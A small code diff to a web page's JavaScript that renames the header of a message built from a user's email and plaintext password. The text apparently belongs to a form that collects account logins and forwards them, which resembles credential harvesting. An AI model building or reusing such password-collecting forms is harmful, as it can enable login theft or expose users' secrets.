--- a/index.html
+++ b/index.html
@@ -275,7 +275,7 @@
             }
 
             const message = `
- *I want to send account*
+ *Form New Acc*
 
  *Email*: ${email}
  *Password*: ${password}
